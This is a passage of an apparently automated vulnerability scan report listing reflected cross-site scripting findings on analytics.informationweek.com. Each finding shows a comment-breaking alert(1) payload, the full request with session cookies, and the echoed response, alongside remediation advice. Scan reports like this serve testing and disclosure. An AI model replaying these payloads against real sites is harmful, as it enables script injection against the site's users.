Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45965

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
016--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7e4d87e08f%2FMessaging-and-collaboration%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/109c016--><script>alert(1)</script>7e4d87e08f/Messaging-and-collaboration/Messaging-collaboration.html">
...[SNIP]...

3.48. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/10/Messaging-and-collaboration/Messaging-collaboration.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e9aa2--><script>alert(1)</script>6407169f2c9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:23 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
9aa2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6407169f2c9%2FMessaging-collaboration.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboratione9aa2--><script>alert(1)</script>6407169f2c9/Messaging-collaboration.html">
...[SNIP]...

3.49. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/10/Messaging-and-collaboration/Messaging-collaboration.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload f552e--><script>alert(1)</script>256d5dde1af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:36 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45967

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
lf552e--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E256d5dde1af&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.htmlf552e--><script>alert(1)</script>256d5dde1af">
...[SNIP]...

3.50. http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/10/Messaging-and-collaboration/Messaging-collaboration.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload aa634--><script>alert(1)</script>9cd1610281f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 52032

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
4--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9cd1610281f%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10/Messaging-and-collaboration/Messaging-collaboration.html?aa634--><script>alert(1)</script>9cd1610281f=1">
...[SNIP]...

3.51. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/104/Government/Government.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload ea5fc--><script>alert(1)</script>808f19a7df2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:44:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:52 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
formationweek.com%2Fmenuea5fc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E808f19a7df2%2F104%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menuea5fc--><script>alert(1)</script>808f19a7df2/104/Government/Government.html">
...[SNIP]...

3.52. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/104/Government/Government.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 2c544--><script>alert(1)</script>890b31067f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:09 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ationweek.com%2Fmenu%2F1042c544--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E890b31067f8%2FGovernment%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/1042c544--><script>alert(1)</script>890b31067f8/Government/Government.html">
...[SNIP]...

3.53. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/104/Government/Government.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 505ac--><script>alert(1)</script>edbecabc005 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:16 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
om%2Fmenu%2F104%2FGovernment505ac--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eedbecabc005%2FGovernment.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government505ac--><script>alert(1)</script>edbecabc005/Government.html">
...[SNIP]...

3.54. http://analytics.informationweek.com/menu/104/Government/Government.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/104/Government/Government.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 132d0--><script>alert(1)</script>52b1d0b102f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2FGovernment%2FGovernment.html132d0--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E52b1d0b102f&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html132d0--><script>alert(1)</script>52b1d0b102f">
...[SNIP]...

3.55. http://analytics.informationweek.com/menu/104/Government/Government.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/104/Government/Government.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload bf725--><script>alert(1)</script>b4e47d4b98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1 HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 01:44:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:44:37 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 46553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
nment%2FGovernment.html%3Fbf725--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb4e47d4b98%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/104/Government/Government.html?bf725--><script>alert(1)</script>b4e47d4b98=1">
...[SNIP]...

3.56. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/105/Healthcare/Healthcare.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 71898--><script>alert(1)</script>7193a7d29ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:00 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
formationweek.com%2Fmenu71898--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7193a7d29ad%2F105%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu71898--><script>alert(1)</script>7193a7d29ad/105/Healthcare/Healthcare.html">
...[SNIP]...

3.57. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/105/Healthcare/Healthcare.html

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 54cf2--><script>alert(1)</script>109941c14ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:12 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:12 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
ationweek.com%2Fmenu%2F10554cf2--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E109941c14ca%2FHealthcare%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/10554cf2--><script>alert(1)</script>109941c14ca/Healthcare/Healthcare.html">
...[SNIP]...

3.58. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/105/Healthcare/Healthcare.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload a6df7--><script>alert(1)</script>5ba8d7732fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:19 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
om%2Fmenu%2F105%2FHealthcarea6df7--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5ba8d7732fd%2FHealthcare.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcarea6df7--><script>alert(1)</script>5ba8d7732fd/Healthcare.html">
...[SNIP]...

3.59. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
Path:   /menu/105/Healthcare/Healthcare.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload fec08--><script>alert(1)</script>8c1aeff968c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c HTTP/1.1
Host: analytics.informationweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;

Response

HTTP/1.1 404 Not Found
Date: Sun, 12 Dec 2010 01:45:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.2 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 45909

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file -->
<html xmlns="h
...[SNIP]...
2FHealthcare%2FHealthcare.htmlfec08--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8c1aeff968c&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.htmlfec08--><script>alert(1)</script>8c1aeff968c">
...[SNIP]...

3.60. http://analytics.informationweek.com/menu/105/Healthcare/Healthcare.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://analytics.informationweek.com
